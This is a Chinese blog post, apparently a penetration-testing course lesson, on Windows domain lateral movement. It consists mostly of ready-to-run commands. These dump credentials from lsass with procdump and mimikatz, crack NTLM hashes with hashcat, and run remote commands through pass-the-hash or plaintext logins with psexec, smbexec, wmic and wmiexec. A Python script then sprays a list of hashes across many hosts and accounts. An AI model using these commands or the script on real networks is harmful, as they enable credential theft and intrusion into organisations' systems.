• 六十七:内网安全-域横向smb&wmi明文或hash传递


    知识点1:

    windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
针对以上情况,提供了4钟方式解决此类问题
1.利用哈希hash传递(pth,ptk等)进行移动
2.利用其它服务协议(SMB,WMI等)进行哈希移动
3.利用注册表操作开启wdigest Auth值进行获取
4.利用工具或第三方平台(Hachcat)进行破解获取

    知识点2

    windows系统LM Hash 及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows 2003以后,认证方式均为NTLM Hash

    注册表修改

    修改wdigest  改为1

    案例1-Procdump+Mimikatz配合获取

    procdump配合mimikatz

     procdump -accepteula -ma lsass.exe lsass.dmp
 mimikatz上执行:
 sekurlsa::minidump lsass.dmp
 sekurlsa::logonPasswords full

    Pwdump7

    QuarksPwdump

    hashcat -a 0 -m 1000 hash file --force

    案例2-域横向移动SMB服务利用-psexec,smbexec(官方自带)

    利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

    psexec第一种:先有ipc链接,psexec需要明文或hash传递

    net use \192.168.3.32ipc$ "admin!@#45" /user:ad
ministrator
psexec \192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

    psexec第二种:不用建立IPC直接提供明文账户密码

    psexec \192.168.3.21 -u administrator -p Admin12345 -s cmd 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方Pstools无法采用hash连接

    非官方自带-参考impacket工具包使用,操作简单,容易被杀

    smbexec无需先ipc链接 明文或hash传递

    smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

    案例3-域横向移动WMI服务利用-cscript,wmiexec,wmic

    WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

    自带WMIC 明文传递 无回显

    wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:1.txt"

    自带cscript明文传递 有回显

    cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

    套件impacket wmiexec 明文或hash传递 有回显exe版本

    wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

    案例4-域横向移动以上服务hash批量利用-python编译exe

    pyinstaller.exe -F fuck_neiwang_002.py

    import os,time
    ips={
    '192.168.3.21',
    '192.168.3.25',
    '192.168.3.29',
    '192.168.3.30',
    '192.168.3.32'
    }
    users={
    'Administrator',
    'boss',
    'dbadmin',
    'fileadmin',
    'mack',
    'mary',
    'webadmin'
    }
    hashs={
    'ccef208c6485269c20db2cad21734fe7',
    '518b98ad4178a53695dc997aa02d455c'
    }

    for ip in ips:
    for user in users:
    for mimahash in hashs:
    #wmiexec -hashes :hash god/user@ip whoami
    exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
    print('--->' + exec + '<---')
    os.system(exec)
    time.sleep(0.5)
  • 相关阅读:
    Cf序列化器-Serializer解析
    yield和return
    pymongo的使用
    Homebrew介绍和使用
    TypeError: expected string or bytes-like object
    JavaScript读取文本,并渲染在html
    反序相等
    打印邮票的组合
    打印对称平方数
    字符串按照原意输出
  • 原文地址:https://www.cnblogs.com/SnowSec/p/14553788.html
Copyright © 2020-2023  润新知